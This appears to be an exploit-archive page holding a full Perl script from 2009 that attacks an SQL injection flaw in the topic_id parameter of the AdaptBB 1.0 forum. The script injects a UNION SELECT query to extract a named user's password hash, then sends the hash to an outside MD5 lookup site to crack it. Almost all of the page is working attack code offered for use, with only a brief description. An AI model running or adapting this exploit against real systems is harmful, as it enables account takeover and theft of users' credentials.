[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
# Published : 2009-04-03
# Author : StAkeR
# Previous Title : Gravity Board X 2.0b SQL Injection / Post Auth Code Execution
# Next Title : Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities


#!/usr/bin/perl -w
#
# AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit
# 
# Description
# -----------
# AdaptBB contains a flaw that allows an attacker to carry out an SQL 
# injection attack. The issue is due to the inc/bb/topic.php script not 
# properly sanitizing user-supplied input to the 'topic_id' variable. This may 
# allow an attacker to inject or manipulate SQL queries in the backend 
# database if magic_quotes_gpc = off.
# -----------
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it


use strict;
use LWP::Simple;
use IO::Socket;


our ($host,$path,$username) = @ARGV;

if (@ARGV != 3) 
{
       print "n+-----------------------------------------------------------------------+n".
             "r| AdaptBB 1.0 (topic_id) SQL Injection / Credentials Disclosure Exploit |n".
             "r+-----------------------------------------------------------------------+n".
             "rby yeat - staker[at]hotmail[dot]itn".
             "nUsage: perl $0 host /path/ usernamen".
             "nhost: localhostn".
             "rpath: /adaptbb/n".
             "rusername: target usernamen";
       exit;
}  

if ($username =~ /(w+)/i) {
   print "Victim: $usernamen";
   exploit();
}   

sub exploit
{
       my ($packet,$html,$inject,$socket);
       
       $inject = "%27/**/UNION/**/SELECT/**/password,2,3,4,5,6,7,8,9,10/**/".
                 "FROM/**/adaptbb_users/**/WHERE/**/username='$username'%23";
       
       $socket = new IO::Socket::INET(
                                      PeerAddr => $host,
                                      PeerPort => 80,
                                      Proto    => 'tcp',
                                    ) or die $!;
                                        
                                          
      $packet .= "GET $path/index.php?do=topic&topic_id=$injectrn";
      $packet .= "Host: $hostrn";
      $packet .= "User-Agent: Lynx (textmode)rn";
      $packet .= "Connection: closernrn";
      
      $socket->send($packet);
      
      while (<$socket>) {
         $html .= $_;
      }          
      
      if ($html =~ /Re: ([a-f0-9]{32})"/i) {
         print "Exploit successfulnMD5: $1n";
         print "Password Cracked: ".search_md5($1)."n";
      }
      else {
         print "Exploit unsuccesful..n";
      }      
}      
    

sub search_md5
{
     my $hash = shift @_;
     my $cont = undef;
     
     if ($hash =~ /^([a-f0-9]{32})$/i) {
        return get("http://md5.rednoize.com/?p&s=md5&q=$hash");
     }
     else {
        return 404;
     }      
}   

# www.Syue.com [2009-04-03]